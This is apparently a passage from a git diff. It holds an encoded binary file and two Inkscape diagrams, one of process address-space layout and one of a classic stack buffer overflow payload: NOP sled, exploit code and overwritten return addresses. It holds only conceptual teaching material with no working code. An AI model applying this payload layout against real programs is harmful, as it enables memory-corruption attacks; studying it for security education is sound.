zA2~`S3rCp!UG&nNAqLtiN#99T-uZpV73L*nF;IV(tM5KX4%?TnALlNDBQi=lV{XMT9W^o*3!i?05q)aO{8{5&~!wNS_SJan3A@x08*xZ*u=; zWRgekgIAPK2m|Kb<(ko;Tk`_S@BP+>OIn?87WE$>771KJNFAp6t0zfiKKwt>baZ|X1FbQ zJX)y7>SQku#J0J_P7my|^I82GMLFU|`yG1gk645~%=+1JwoF;h;%3$Pqf>o_otaXnt&n^U~eoVq9NcTw#FuTVw+ z`=Qkvh3G~^MBXC!V58iV`&8T~vY7(aGSOi5b?n!YJX#&gzzULmw;MOd}m^mEt}OG03>c%7v7i!}7!`Les_J8z07T~44Dhr3R$^7qfU zX=&f3>;Q^pJr9-qnM!dFPJRJ@VH@^a>^l4*@_q6I(Yl}RUX^=9(k!DQbz9yR7Lhtp z*M86tE#5I53eEJk&zg%>6c3K&4SDG}!>!PXfaLW74Zb<@yK9bewr63zKJiXu3d8;H zS78Cf$raGMk;R1JFsf<0ZYLh+FzeS*d&hk(xZ%3ZE#43RIQFQbu)e#Rxj2yhck0}j z(*eXC-Y9lR-iAc)Y}Od-yF|g?yBrd-q{-E}OF}>cr4;e&Ai|c3sq4 zA*Z^xo;-OxS9_!Qy7QIYk^Z0s8Deb{i4 zazX*Q0%g1l+H1LgGaV%a-I(5BY!mz=UNEN`a;v=gw~8bmC`Sm4%aPwMI4e$uSHhA~ zC-{I?ZB1zF4CD1$#`%-ykP^+g4$1*_7$#Fp6UpMz%&;!#(ysN?Wa*Gz>oOYNvzqt* z;?$FOD+@+8a&rR+Xg3x+;DxRK@E!>+{%kyty@P3`Qm>yPkhLdHwycVxc095yF+`Vh2caKSJAdDbN> zHJXMyB^J@!w}=K}Zxc!IlR2l~Qd*zmyb1svO-}Vg)3Q;@yTV1Br?3-NoAf}6@1*si zHV1hxklZ z8G^H3u@Md(pCQVCK6%M!xU|-z7uUDV`=FQ}5|VoiWXItOOmb2imX%jN`?T2?3)6mK zm3a9E;rsXC1TUyz>SW?+hArIE$@Pz)YR?uaIBcMmF9Xg5khQ6I$OY|Z`+C7M7*gan zmZo$jx7?hZS(wPQ`5g2-11{&xc;1P43qDjLpEu2_wZhF*_kJe#wMOQR*x58y6g04& zAjVyNwtW>E`1ooqklsLOLlt#>QC1 z)}wNp8xYEYHaaZ}9=&g8zfvvQu0@v?M;dMk(+yt*%C#9@)JMV+Av>K}b62_;?F;$_KL=BRVz!%V@^Jy0k~AO~xliRWo9LYA_OD?N#s@FA>z+-4t8m{>2kj zxsUZO1Gtb4^?`K}kPu$;;~{50(u`<99R#T5yf_MW{ZXSax=2ox2q<8Z0ORoHR3R&Xw@I%+AQ*66jO{x#(Rw|ce& zJCX6>)dsmOFIF#e2o4CGZ0sO(CdvASsq+57mwv%yqlEm%?L0fCeUv)jJ&++>%REvQ z#he#Es%2%diejN>=`MZO4~@B4mxhCDrv+s(b_jZK%|~QyT0lzpXyLe8+fIu5T6#!S z{UsiJO%9C{&bh^kgnqtZU5S86Ji1x9B`eJ&m>paB0_84R_f^>MJU@alxyDNJ~N5^>M3z-9E&_1WYUcGc_%zhY>;-at|9WGd!wPOai zj6`SLn79Q0wd)F`9l3S*F`TIk{;jWY#KyWbs;-|sl9^~bOJtn*VrVr49)#|~!`Hej zfroG~>U(cj4Lw*SGeF;@!X$oddu1wC3#Pm;Ow%EfE}Hnfl(7c+>DNN8DXyZ$mWAQa zsc8XADYD+CGB#;p&hEkOL)?*L`^y;(eptefSPeOJ?4()prY&WvUh|IZx}I5g<>cfD zV6XYC-ZFc+t6nqn{J9NN-PJLzbpdRK9)ii$dPf$oORuBhtvE(72~knjl|<;PSm-fi zNGv?##pa$Hir-oTc~X7kaUb@k1 znwos{?bv{j&r4eG^RN`#2|}TxyMKDok$_9pbS$()t3jQ0MHi5dJe$1$@l|#_F15DT z!~9!o51thws)q9~>YryHzr8F%_{%##MTW!nVJBU?S=m0dZ%nkQ55M)lDsYLhadgy< zsr~M!I0#!F!wGQ0+u}?yjOWhTVewL3U;?*+%F^NlGKEg1gy}P_Y84i#r+@=ZYM((Z zWvQkk&nVLCt_Bh9ptfzvB_Apz#5te!VxqF`dt#zeDbw(CB}K?ukxx87r)I}Rnd_)Q zA(mO@p5(vD{6Q`%B1!Cw5sCEHa8mqw#&$|GoCSXyX_fX(m-z|Z`*T`U?x3GzStWVE z$63n0k>O!7{K6#YojuwLOX6p6m11AJ&p38UyR_{V!94nicOIm=kk{8CB&>^^G+Db$H5smgt*_lNN^!b&3LOw5$LvzqubC;q zYh{`Yq}Lhs4>w+*sKNT3B!6v8cAsmO>5wEA3W>Y^TZf2UTm`;LA5+XFB}yB1X+Pw8 z+N<^AynZlkgW(}u$Iz#$u^l*y!LKGR#E8#$;j((#j>p?VL?*(1;cqm2>w-N2} z-)ah9d$}2qCRQHmq&f`q&4#ZA|C(Y{0x)VV<~5A$(MW2Dy*_@2W^+nGPEKn0R0bEC z@@hTL%ZNdC8Sby&*bwRSSuV(GrcrS_TofP#LI*bx2#8=6)C%o5>9LXxWgi0n4r3qvC){jLYIu0qZ5FVKViC=G zQT>H2#NzT8{{V#g;xW3MSdJ)w4{^9Z1nX(^otBfuJCIz zv?S^eOaj+X!0bs0*AlLR(3TzCZa~1872txoe3T7!pqh*J;UT7g|s=gvf{3qM|!2kUXt9LxV-zS0SPh zW~+%k!QRs=O_!{bBzVvlBZ#R!(w}l3lTj~B-l^#3c5Hsd))>$Q?~ec0Q9kmPVb3Lk1^Gv@xL$T5(sf8D!nr$~S65e~YSwIV58l$qjYUlLu%p_ix)H4!|* zU%bC=2Jgl5yzgK;zuhHWVSE!JyM2Dstzu_twBfsc9v`-7@@RZKk*masOAN z_N6PJiW;OiKZSHw0{;D|#!>TDY^lG+WD}XaIWkw}gd^{xScp zLEp0}JpX%#K5@gt-E`O^iE5b9jfSx2;|q5K4NY4+Z}vFI$_?7Z-AxI)(91u5uFlQ4 z9tc;K`^!0M*B!B(Fbg};w#a9vRqGL43VruMmadaf+D|3E*Uzmy;%MVea zsixzJ`vuZ!g4BmiZQ0bhg7{$J&Pxww2$hif2t`f#F)M7Q)Or*D(N;t;BG8)AS`>v{ zy2Da#aui5iDz)=kiMZ4#ul(jTa;dDU&j6|asKnoN{g^Y!@;6T(npKvA=CQsHIbMEC>dUs zn%8bj@>F>M_nn4(;feNu3{WuhdloYiNuB9y4aCTk!Qd5g96=WO6N{vDYs^ow3w$0E zIXxsF9Db^f!c;P0)O(jX%>)f4Erwo_HWgEa!0<4uon1GZo zK8(NAW;9?A1}fM-J=$_Z;X#(;pn0|I4W6nbXx7dg*eIy;Wv8MxY#O&Q7CK$a9?I(6 zi%3L35YNFip8lbH2kG!CHPyAyLqAP&!A1Z{9WlbfiFeJx^YL)-{bIXHHhIl+oyM&u z#4Pytp6LlJi9>*+?YXMl*F-x zDB>~2LEqN7CgTHUZ+^2sqNZ6_=4WpyA>?BI{E6>VP6)Slx^x1He!7e|OEA)ObJR&b zyzuN4KdloJPkRf+Q0=jaB$3hOssl~1F;t8Kzo#Y`_^|4ek(GnqVbIldCZzb|v;ZN` z@yaW*_zpcM%{Un=*Tk}hwlvUmjj9^_zgymX4Etsk0cI=$g)acY15F?F`54oL8 zIjVRF3Ktia%9fehdn!WW?vf;`t+8e{sqE!De$Y&4J*-*rt10yir&As-T}eOv$%l0y z2^a7LN_PD%q;g%YTP|0rqsSn~Kbp5wD_zMUg&CBns5`3;EH3+TR3SrF0||>tJCku9 z-DIj;vd4^fKm#*hK=+lAfs{3cDk`H^8ao=00)kVBhWFBCZ^CArL-m2Qpv8=Lv; zMZ;~5CFb>8hsNR8@WSQO$dB-MXuxGod;2Hh*F;UC;0uE<(>PZAAy(`hgB+4rR@+}X zDgaB4o-4K$3)E;FMj@eub)}(vgw^@SmFaA!dlV%{gQg3%E(>Yh-4p7)c6B<#+iEx% zwoab~mw_l|`hJFAMJc#`-CEMhQowz^)bQEk)SLVhYdH4>9bK6^QT;je8w$b#k5qV z8}lg3<@k&*dWK^Sg}>Gn`fUw;L-@3yvevFjbT-_IOPN9{rj#SBIo`xOo#foyf80>V zkY^>LWtQx!{~T8UaZ~2+<#{0@`qn*4;Z(Yn{}t^@D9TaBxU*C`^Yaf!#O{+EqeLX{ zn<0=#@!JeXyfU1z`{qGCEiTysGGy|-xuwVzZ&oM&#A)m^0Dbb-(l(>47r zj3?w$IjA>$W50rl!^r=nFzkv4Jt9R^MOh`$mQqrEOa0(|q%?&qNGjrMc<}SSVlqlL zBW5&vG)(E?n+wX_g=o}QTHA~0xE?p!$J5ohyF_PiDd)p`YPFc2cse$4u?ljKGFrWA zJ-Lo**_4e%oqt!3DLU3)`4OBq6oTRlQ_@0E&488@72voX*I8#K@QX8!Vge$L0^u_u z6y=_up1CBN-Q(q~`a!Lv^hW_3CI)(!mx$}Q`%5?^T#3BRT=93SCgsIEI2^>S)MJm) z9o)>k@(sIwY`^rq<=|JJ_O}U*-3NmwoYpm*?@4n%%z2GC$iDta|FCQ3?p+}LhYqzY ztzo7Pn4u5;ZqPViott8Se0YG;M{x zS-q4v;90+slvYe;_Ioir*tD&0T?cwU@E1d+qr~ts2o=RP_X`PZ6fMZq}7^PeH|+4zN9$Nh1tiyPC>YIi_7P>YB&sG zC-$HZMPW}ATBAu2sT#v7PxCxAiThMNUMF&^z%M_?GtaejEaQn=Gh)p2BaP3#O<2;; z0z7E#)eMEQ#GaC`ssvt?want#2R)X>F+t$@8o>u{jr?9Xo&Z+j&|Vry`Bpjh=(IK* z&U=z`71_gaip{Cs>i`?Y>essDaIOpzE!7J7`4mM07+opgGiYpg?+;!e$k}fSPlyk@ z5j(?985#G+a5QCN#1?K~7tCY`O_Tzpi|u7Pvl3l+xVq}_OSm?YTC-zYGVMVU8mB4C zqRrTQFC-G}B#v(gA}edg5Fw&rQ&@$M1X2T3REPIPlA$~7jD+SaTanOn4K@1WV1g#t z{?*~^x|ya5MsKrQo|{(rTZ50K|Lr|E%Xx`f@4LabY%8RY60B)$7q+kp37n}UD6>GX zpF3^lQ0k5gzq*r0;ctnx4Kb{*KAmhY)?p*@iX6+|KEFggL*9vVps_*fNiQnP*gKsA z8RnP1@cC4`!Y>&VhnieepZnzFDE-PB{H>h#3>6fYF5f(~hJ3}YEW+AB26m><6jMFu zd}Ee#Rk%>Dc^4s&u+Ywyxn6b`_t)`dLibOec+o!k;xVwV>^=X!`)EP8a>tI?e_Y&7 z4S!Hq$_v$f)Ae%DT|euqTN32;;jFwG*t-@U1BqR_g4?>DWfX{}r8nQEOwf0^s$RF1 z^|RT+kT74xA1hsqQdPS)JsrdH@7j*8OJR+iFJpyXHiT!t;ICX@{`r1Dy|)aeK+K?K zsuT358G|6ZNucLOn$(!dWh{fa?2|N^aS8WmEv= z#tl;-ciU+EY=;y~?6uuJXVbpp*&6Ef20j1LQrP}ag)<|~=XiqKtO`4L>6tKlL(t97 zFEOgA4OIS5{tna1jW?xo#|bG-A5U#is5EqNrcucx^+dj5U-h_ zPx+OW8QO5{06b0C5^WW5g8++gEPvVo_f)z49tj~&-oQTk+z_U6VC_J8naY+iUr+A( za7X$bY85IwbXNAZ?UjAzn~G9R)IX@+L^tF7oy0?{;~32QjiooQZmep<@Sds)NF}Q1 zt!fel(HD&KX1DO&Q;Vb>S>pV~uBhKli4)1%KBrYQ#TD@f;Sy)z`oV_XA5z);ZlPdR z{cC8lLC%xV*vL)z>*%D}ql(u1QgH50gU)Y}CY~#}zzH{)pS3m5%EPhISe!K3>A0em z^$qc{0G)c$OOOZEZbP-ZAC>f{&ZIJ8+b4$B?i|)5v|%}IrXg%-&nJdFqJh*>Yq49y z4eVy)(Cl2#@k#6un2YhSM3}?&dE}0Sv;FH%H9giT)$)%YoG}+FtI?rl@83(YEr08V z+Z^v`GIVYn{$Bm_H-t1%^4Oh@Bq6LU^-E}8A(wF$LzzadX}u;zAYMrfO&f%5Y~Ab! zp84|UQ?*vG8YaEDp`8lRPF>85-6A&fqul8AziqL>1?S+d1XTiY8n(8$FF;!dvxey+x@k`(uoKhj)TAoTcARGg6)&XA@xA0RE^Xg>cX z!wHeaF~x)L8Gs*PXgK5PlH_w#vSS+Orv2N;rukXEULnBBwG~6`QYG( zRd{aU*D^a|JUvRqpEq&?Ma5zUpXv}>ey2RsU#skPhiy$Ch@qDM8mwKzx)LW|yVzTG z{~;#aFT;&+btyz6vmA%SPS;-=`<9Z$f>u8D1tqp>-}-W{K)*-D2rabc0IXp5Cv)}D z@+nd}F`$2&;2HXGbwFtQW8W0gUSY% zzyX5S*>iIALCDzI2i7|`I;KS`QVVm8JWp%kWBo5%@Ic}~SE6@zjW2xu&590vHs{zn zx!GFRW40{=>sPAnjm@Ad=w*t+v>%*fJ=5?;(>v)i!C6<#oaW2H0z{slji%3nrfKW% zVHe}dIqd8lK=cLZ+QXbH{ctSUJ@0=X=O$FMJwg;v@%Dsxr2H=Nzc5%OHC|sW7#sK*f#*}uV2bs^>yZZ?L%r| z#JU3N;(QiABCt(D>LQPMF_KtLSb89OtO)!i{JE&-QEZW5#PM*>>ZK{wMhGGb5eT6V z5HB$UjJw1UCJxHNj7gT1j2$PS|2tVD%*S^G75hrlBDvWY?kSeLL0aT>Gg zAM?!K5Fe02qzzsNX-iJa$+WElDQj-ZpPs4-1pBNUN8?dD5F$SCAukU&T$;5oS#yU+ zqgQ&?iI#BTY3_6fL~_~_e>4`VT|4Gyq`FYp;KO&IhrB-3HTcwJ)^{NQ_ST@fLPxr{ zw&?!k0Uth7mCLudx|+pwMCO3K4OE{F+e%SLxhc4JsI&$MsrRbErR$GnI~QDLFFZAR z$H5|%ws$|l-Vv$`#O9`$77S=90h(%(-;~0{%8MahbNEjY_|+Wm z7N-I7=GpA+;MnQU-P4k&F|FVN>DVAEl;Z4;-ZP0fR#wZ56AyB`$D*QTCLOX-S^qxJ zH|y}bGhNnG39G4*TL80`T-jHlACdChQF*zlKHO+A1`dg5ImaoHano2EAeGuBFZKeG zUEw0Bm=xF#Qth7=aLJtGUmub4zKXq9(}-lYmALYP&kz;N#wE>hY%yO(QN!C88G!Ci zPj&Z%W&VxWiuG$uFqMP+GK@|$Rssv0n&pdEE$uwpEUR_AsvYC&Gx8H&wb9fzdnf2X zF2a7wBEKmD%)c+E`z$A)RDw>+`~k(X#C!wbWSGh4o+2ikM?uPCb0_A^eJ%h#R4665 zrfFqX&}&5hsy(Z-a>84}$9i6S2GaCd8`5DtO~@)I41Jc_j@F?QTq@|oUKSEkFv8>* z^0)c3@%+B|%B#4eSQkSt3A?ut*215Z4;SAUpQ3^(6fw3vsOIw7KRrfJ*YS{~?3-Bx zwSn~$pahXcDeL{@yUN$AQB~S=?Riq3_?>2k`RGT%Atk`(d3vwoDyAS10CYOM2|y-z zGJwvR=ClsB&%qH=gx$zKq8y=z1R>~V7o0SY2O=_W77H9voREOj^_(u#IWUk&-@uZz zzmnu6idO=hh^HWX%jsiOwR9cz=!p4v_sLFzCqPBb?umBYhEK0)-CH6rL`zBtdnzI5?_ie zP!nm7QZw*Wgohj@z+*HUa2j!MAA%`3Mgs0Bsmk$gX&@BYZ?awx{5e+Qa~8bbLM%t! zIgVq$5xYSEIiZ}XHi~l`p;SA&e*sQ_$1bvrw{cIG?tzY~FBXA)Pq`w|QxMb7#;jfC zsi8b)kYF72=wiYLSZ1|am^>$Ug?s-pSOriT!L2H|^e%bogMMs>jUrB z=1GO78kz}f%2qe}a&RXAONHHCi7xmq*igC%`YOYh(z)>VGvdX1cwjXL54K=S)IQKV z=g~{Ih}095of@hOe5h=~pQY7GbFP$H<*7qd1omw)|Z@R|DjUa!#pck366AHg?SQc?+e*wfar==TV|d zV6Y`Tix8R88H=CClviBB0f$Xzd;kfY$PGac^ibG@U-%U7 zINbliA>jJi@rYCy65PQLZg#HwE2iAtPC;|2?s;QYvb!7u%b_R>h){ zw2U$SzenbnaBv+stVGhNLq((pdeckW#+`mvlAx)tG&Sg{lj4d zQE1l6hvvkLW~e%5f`+lQX0CZo1bEtPt^1D@mN1Uef3IW~S=Kp+&0k@gm5puA&)#2~ z*uVWOj!++W37$mFeW2+0Se`64$z|YQ>bSvud!m$1?A5OT|9SVOoaiSu-|z92ANYoZ zT%EWKyc94hsGM~2JGuxkTE~0_^gU}=NA8#YVM!qvIyz57K83QvP)omd#0+bG3%a`5 z$=iGtpsW=?|ESdISv_Lv6En?QQ}r(Tc=%%lI#Av#e?WX+wfENBX_uM0Kk9Hp>XG0l z#LYwFLRPEKLT#?)WRnha?eh{IEfvXdMl5#5*^wPK_OOn7RpeRqcK=^{-x&^P_w_qt z3=w5a2ofzBEqX*RK^SEaf*^WJ2#F9q>WusogXo0lL`j(FJ<51O^b);=i5f;35iQz# zlXITyJ)h2(_shAiv%k2mxo`X4^|#hwjN_cL$<>!iWv zYWk*-TZ(&{f!2&@t#aVC?=LUxZqkgB)&8)Myf3b6{)<hz~oALhl17C81{*Xg39F&s);BYs3Ch*jT=B2B|k8&RY1_n&V9 zjX~te7O%#ljaPQ;jr@*pkgP6SDH-RDMVkOW;17*_kM~uYtsd=IC4!PiQULwDpXJuW zj(3Iyy29$MyZ8cb7qc6TtKJijk~%-HS5GzKkB<-cf&)x9()%+Dt3ECh(1F@h#(tr$ zOXe&Ys_oZrF#QxSHu{1X_gc_gm$5@K7G0?jX3Y;$R-7$76=-Kc3#vQK+eKMJn88Wj zUb@RVO|XWND;DJoh^iSaxc)lJTPLriqZOT2_$vs^I(xD#`Q6IkHsw;zCU?j@H6?qH zZWYk${5vlx*kijFPi_Yt?Nb31Vld{q>L1;7xt)Exvi%W&YN+H|kN?p&t9u}%6^ED$ z!|uaK<9DUMONhPAwqE^O%{;iO6xZ^6tcxGSDEIu4yVjLlL=My{s=4K zzPTI=_Afm711;EmxR^LQf8-NeH~ph#3;KoHnqZ}q%I-3;_XS%^=9RAGoALJaEyF6D zeK_I*U){Aa>2|$l!1+R13%Ji_SKEEKG`Z$N%=t=sUM221TBOnm|I=De=v5&>!V4DM0+Go>j!_AOc!F|H11Zue%BB6bxNXM{hGTH&o0 z9=}1rB$i}Ke!l|&)~<~TS~ezGZv&Edc1MYaY=(+NV(?uN*AZs&P)N~Yh@;9;*+*F` zvt-}x7b9D2lw3g8VqLgcQPzA;hflTce$Tq|l6SM7SUkoU(I#*F!1h)9 z(bnx$SM?Vs@_ z*LnVlJg$Y0-yrD4+8aTW09vVaX05ySTwy?(xsvjzvN&TC#0+U4z*FO)pn0Cz&DI0oU8@t(aVFs)V_N|DeW?U=qTqm3BN#x!3 zvN`>=gxHU@v4c0|u+{Jn4;O%Q-h-+!cdyDy657d|1yw|n<~I|^ zoLz@9WFJ!&!?tY5XF*XM{wY%5PZxaO7l@Tefg2|@GuKiJHScAn>h%pb$EsqQ0zFoU zF4eWNn6ro|D_-2=%X>{4MS;1 znd#1e|AceC_Dzba3l*#Z+=O*(s+f5)-Qw=&>e(G*!yS=X?Aeai9T9par(bQD!&+X3 zwk77RA2h6LmCQc1fkCGj+f2071}Dvb7q)gLRsWne(DTHK-R<4#4oLOR>8Jo8IN`bQ zA96cELJ08J82d$KP3GZ)>5Fb{kB{>nEQIaqPdapusf?Lidvi+ zaV$(9Uv{_mxgx&GMeYfOLh~=~ChDWIcCmFP$*4= zEyyITxH|&MVXTyb7PIdkDBN*l8<-wuTLx9utn#${9P}!;B2kkCN$1K2k>7OB)%~6u zd$>wup-3ATN}hFI=wh2@Z8^biqdA$|O4_TOdI+{+`A6ex{tl1vuH70m$-=s4JiiBL zQh)M?m|5&i^L@f=%+e$RYaJ8!TZ1b{e-KE08{TG@p1aHq#H?_gA#Cwz{BGQl=_(}~ ztD4#C9*&RcH%kjG{kIu`@Eng0k_<6~`gdvu?G{EZkpnMby;G`#zct;;F`g`Whejo%?@1;#Q1_C>z( zYHGY-SDEC%Jb9B$K~rz8CYLz94&4LzHTS32vqXD14Ekt_b7EC2F~aCNhJC_UgI{!R z9oWi3gT`?Yx_~lIb{WxX*N~*0D@Sv z$w*J56nZniU#R-Rw-R~_L%Dp#+VU(}s(@zT&TC`HiGKKtA&MK=L(C`ttD^V?%$mor zz8JCGaA&LD@9|ZRezMQ`h;WagZ3$=qPLF+Aq(`zx@gg7TOmoqWP4}63v11`3O*W3b z{~vc%lp#78<##Qq`?eS$EBHqu-M6ss*mysT(VX0?a}9-mGxbYn2*we0pdrlOC;o

    KSLL-O^6anXpGL9f^H+V0@QXns4b+%eJK@ zpG}~0o!rKU0D**v37C){?*mwE-qiOM#i0T{HQ?UMNQ0g>Hcmr4&TmFwJ;S)4HS$r* zNXwsC#UX2IMAszP_qnZ#NTAY)*R6MceIKV4Lm3Bz_A8RaD|tGp8qO3l1BCXB-WzO{ zd)+i7mt&I3+_iCsnoIr7gZv`gtdzly^8z`vnOy;q-?us5@+D^~x0J8^$C~+~hLhyT zH^vrhJ%KHY%AnuxqvL08lYXr>#Etf;+fDaKN`&nErTsyTuo}mtIrclvN18jrqFIzU z`kqu@jVO_bpU?)8)5)S6V=Gvw$tO+MFeOMU^;^Cj@w5s zdeluz)mc2V$i64@@MwSQOM5hD@b~?#`AqZCcpr4l)hlE;c-g{hF6nee*GGwC?PL|9 z5uv`9#tB{Gl~zvX*&TGstwI@VPKV$OWT~o?c~hbbx+#Ru zZ&G)`7xbX1(M4C@L&&1%ItP|8H8G5x07NHUR)uIk=#?F&q(ACKEqU-WIsO?l!Vk`tM90UCDty8B-CpP`q-(2wh4l#3KyG@-9W))Y=>O!Noyi{} zFS=kxzkXLK%)~#SjPC2Vj_B3a-UF#fGOL^p3hXgDQ(Cg1?svpL1c!~jn&&>`%x|8I zxP_2?WceO!4|zs(l0VE~fmPQ$ev=hwk*X`q^x_TM6Ty9N@-f(zzD)l~pTX*#+2`>=I-rxvQ>rcRCL?A@!GgI&I@>AaH8_4asSMp8I6QKbQv0LCz zA@fv0plO_eC7F$z$B_WxMwshE?cH>td)I6IZ0$C}?4le9n}<^EUn1&VDxlv6>pi>5 zb2j3X(!*qO+z3Ae@1K!3OTQDm#qV^aTfmR3Fa4&ZD}Ytqx=GDPvq7d-maZ6JY}@g! zLj_d4`VLHc&N1YoDNQe{I%KRlAO|7(#fZ^rjex3fFfg@w+=v&ZO-LkkKemf zX@ue#pcmrRlvUxQCGMI)eUSh4^rKzo)7wwJm2_nT&VSh7?-KJ?k#J?`YT+4!6;3{H zVTF~m8A)p3U6K8J=XN{5qrF5vgHzYM%D?jAoM3lHy$t;-L8!c72KcOQ&gQ!s%ku)> z*9->Vipesvf#%6O0Aanw+Zzmn8eYgZk!L%5ICkDmVqUS!&@b}SP#I6Rim?!Bar4Rl z-LF4c9RkYfAMY20L8ENJogwljA~zwkRTgg2BrbvG7}*$=+3~|RCK#0 z*6f)Xr=ot+d&!xcGw`k8D{b$nA7;OJ;@Hx01R z5eMw#rz_s<1F?<8 zkUtMgh?r&*9>jUoMHkQhF&yO#n&H~PC;4+BMsX?tdH}_k2iPR$;cBfkgpKfCHNvF8 zf9%g67%iMtCrx*wMB)_eb~n-PY&OIz1OU9O$VqHTUJ97h zwqB|Rqx9SgbTC*0EH4_eTbfTR|%;=1owj+A*yJvB+`x&&qpU(;J<^;uS-}zt?}9X=GW`P(LQT^2dn+iXmRc;NPv0Ai<6}@)7x-oqc={4lFpCy-`p|NX|GIwdyB&5XEKZ2yn)*M=>%v8Nf${{rR=0Pxvvs`K`u*ox|!SGmM^LQ#tyhAUgFcn3|D9Ct}IGV z66@k(Bbo)f$qsmpDHAtC$*9p|fah8d#K8TrIKviChgTpN!ZEq+-4(d&PU?A2^=w#3 z{wQih4rQrf-RV_)(<0z_Oc}ejgu!1Ry!^G15rL&eU(f4^f{Rf;5OQ)3TY=H8PSA{h z8s09=9TS-SgxU>J(mOdVbN#psM{N^{&bbYTEsLf>d@DO$KCBQf3@wngBc4atMXxbY zj%+-UZKX6OfLYwE`5cmPL_pl8J28^<7WcM09uhMkn012-sT9!2=<|n`E_@f6_K+@}?Rh=I)_f zlkCRgJ2&a@UzI^Mpv|${^RQ0!@G5Nuft^5BAhu-Gy29zj#&@&^W~Y0L2OoxKvk|v3 zMy?63EMD47!C%HFU)m(I(L|={@J`MO>{vsDpjMz=N;+t|_T>3M^N z6h&V6#81n_fXT*JEV9#uVPA6J9>|b8N7s4*Sayvr*NVd}Q>cv9;5C$qglVs)4aI=Q z;L^gqEmx4XR^Ur+c60t_VG`4T$zY7Z?izNS@fyMpTmy~?_z2HCfouuZ`JMYwh!Di-vj&i_wCm$aSC0%RVEg0Da+hF`sFx#-}bG zwxcm|6iItck`wepJ@wG{7-5Vs50Kl(zufkrGlLfpMDXsN7fP4#>2oS&nj!0q75mam zh!3VhaIu&tzIDBOtL0(bLDeMbc(CXwuzaj(RXQ$cwC^y8akhvSoFqYA8_#BDz5NKd zgw1DER})BH@ao5wi_Fzzsw3^iX*E3S;^#u({94l9c0_&hTf=<$HOe%>l{&4oA)a30 zX1(~|T1Xr_+&pH8YXecBQ8`w>(18g`^l!Mn(hKB?IfEY}2N2^>|M^`UlcfF$4{CFS zj=M3@F#iB4TSY6|bCk3g(5sHmhnMLt2K9R@tmO~)&t}lB(bPp=ogk2!1%D{M#GDpM zscV{Dg6k!17CJ~_ogN5!xf&{(zp22D2J=i{e~FMdWE+BC9h`h(fdx?c@&a)ZK9G5y z+e1k9bKzkb$KXp0ccyMp`+iV$HNl1VMW{}n`A|e!M6faStVw96wEw2x`U}O5wuQn% z>P2Dlx0UWL;xh$Xr&LeM=cZ5o?A@32PZUR26G*;%hDM3%B~q=SWtOUg8F0h zGV}6MozDQP@@&1wm()+l!AtJh^^Ioy)wKcDBR0~sEO0od6h%Vgd}zGjaWG?l9O^{z zQ^G{znsD&P4GTkV;l$rDx!Vt_>F1vJj-Jc)(GeL;P4UmW?uoyK5O$5&2cZ^M8XKwc zz1+)pfWwP{-CYaoUaTaEn@vx_8pz*REIVRO`|j}2TMe`&VlK-)+7=IG#}O&? z%~ON*Pfdf|zOcXPZFPF%ov)SJ#!!$y!=9B&UrP|gR{*gT`(-#-``O*HQ!O% ze;Fo`;=jG{ug+2r{+Hu?2Pmq!FcMjUtrb92Z>~K^fx`hjhsn!FMXMsyIN;Vl*UrvV z_Vm2FAg3pg1P?L~a_K!~;j+0+2YvJ{PD3U|&AxqRmht4)yAREjzd=zDI?+vgB){B;R*6dwiWG*BHp}kcz47Tl*iiAwJi0(T zFarGv!|HSgnMO7Z?eX}la91Pt@Kc396>iy1s|`+LFA$Upp;~jt>;ya1a-s)weB&ZB z$QsHa)V6n>;io=+Tba|whoD%_{D+-TrnU1D!^QL6Y_*ZLRuVxWy$VkPWN4E%Z@r_o zUs{WCkafyKH?tn!qEV|Tdb?zpGmP0)}|I29;U zC^Hqf1KzJO(osHKXXey+aL6S=@=Ro!f0D)27=`EZ;1%4B_6ldb+Fik{2|ox%fn7e5 zd*CUxR_j>QDMTpsw2^Y4Cc#wX4c+TmeeEvCVAMCla_3u-1W$Nf*O3)o6dinRnN+jH zSY8mQjXFfhr9377;P)z^`AL=j*j>C{M-_#7wf^Y&ey9Qnrm>nHh;k%dzIMY`KsMkA zJsCFm{^Uwl3Q3oY2{Mmv=jn}=fcR3?#;mzy)?c#AuvU~WkDTVV;jink9O4#^l|T*3 zE+9OrW`4IloL3IiF^BYPr&!AFy{o?!->J5BQXe@b%CkH%OQR!1%X2>DqiE)`3Zri_ zge3Tui~G(VJI0XMbyR<3!3r-R6NT7gY)8uDnABRi-S>}p5{Z0d_8see#_G|Bp6+4| z)QCB6cb;AONssJYX0ADR!XS2>zBW`RqXwdml56_r1s6*RkoJkcz4WqkgvgiRr-a4w zp$!4OyzVApec|3Q1D72Q$sDMuxhP_#3|kAWEyS&!UXZQ-aSv56mUw&((WLTB&qoi* zwp4fSQgILjBBG1fPN}NAB`9iz)(QJx)AJFW}F~Webjm4R+}WcWty@YUh)c7)Ldu`er$) z)3kZN40T>#6@CHVS26=CB(6c*u>lj)dRx()p_IOEd!>pZz zZ2Jj~d)1-o!+Dk7O85Rrm6rt?trmoTuq<3F2gY{iBF23ENGXm_MP6bV77PLkN=+A8 ItYQ=LU!fkPbN~PV literal 0 HcmV?d00001 diff --git a/inkscape/addr_space_layout.svg b/inkscape/addr_space_layout.svg new file mode 100644 index 0000000..53cd898 --- /dev/null +++ b/inkscape/addr_space_layout.svg @@ -0,0 +1,782 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + image/svg+xml + + + + + + +   + + Kernel + Physical Address Space + + + + 32 GBPhysical RAM + Memory Managment Unit (MMU)translates addresses + + + 0x00_0000_0000 + + 0x08_0000_0000 + 0x0A_4000_0000 + + 0x0A_8000_0000 + + + + Some hardwarebus (e.g. PCI) +   +   + + + + + + + User Space Process + Virtual Address Space + + + + 0x0000_0257_4000 + + 0x0000_0275_e000 + 0x7fff_d9c7_8000 + + 0x7fff_d9c5_7000 + Heap(grows up) + Stack(grows down) + 0x7f8f_e559_3000 + + 0x7f8f_e579_9000 + Executable code e.g. /libc64/libc-2.22.so + + + + diff --git a/inkscape/overflow_structure.svg b/inkscape/overflow_structure.svg new file mode 100644 index 0000000..84824a4 --- /dev/null +++ b/inkscape/overflow_structure.svg @@ -0,0 +1,426 @@ + + + + + + + + + + + + + + + + + + + + + + + image/svg+xml + + + + + + + + stack frames from functionsfurther up the stack + + + + + + The Stack + < local variables funcA() > + [ parameter(s) to funcB() ]< return address to funcA() > + < funcA()'s old value of %rbp > + char vulnerable_buf[]; + + + + NOP instructions + + + + Exploit Code + + + + Return Adresses + + + + Overflow Data + + + + NOP instructions + + + + Exploit Code + + + + Return Adresses + + + 